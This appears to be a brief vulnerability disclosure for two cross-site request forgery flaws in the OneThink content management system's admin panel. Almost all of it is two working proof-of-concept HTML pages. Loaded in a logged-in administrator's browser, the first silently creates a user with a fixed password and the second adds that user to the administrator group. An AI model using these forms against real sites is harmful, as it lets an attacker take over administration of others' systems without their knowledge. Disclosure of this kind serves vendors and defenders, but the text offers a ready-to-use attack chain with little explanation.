There are two CSRF vulnerabilities that can add the administrator account

[usermuziLi]

After the Administrator logged in,open the following two page poc: one.html---add a user

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.98.88/onethink-master/wwwroot/admin.php?s=/User/add.html" method="POST">
      <input type="hidden" name="username" value="r1" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="repassword" value="123456" />
      <input type="hidden" name="email" value="64345647&#64;qq&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

two.html---Endowing user administrator privileges

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.98.88/onethink-master/wwwroot/admin.php?s=/AuthManager/addToGroup.html" method="POST">
      <input type="hidden" name="group&#95;id&#91;&#93;" value="1" />
      <input type="hidden" name="uid" value="2" />
      <input type="hidden" name="batch" value="true" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>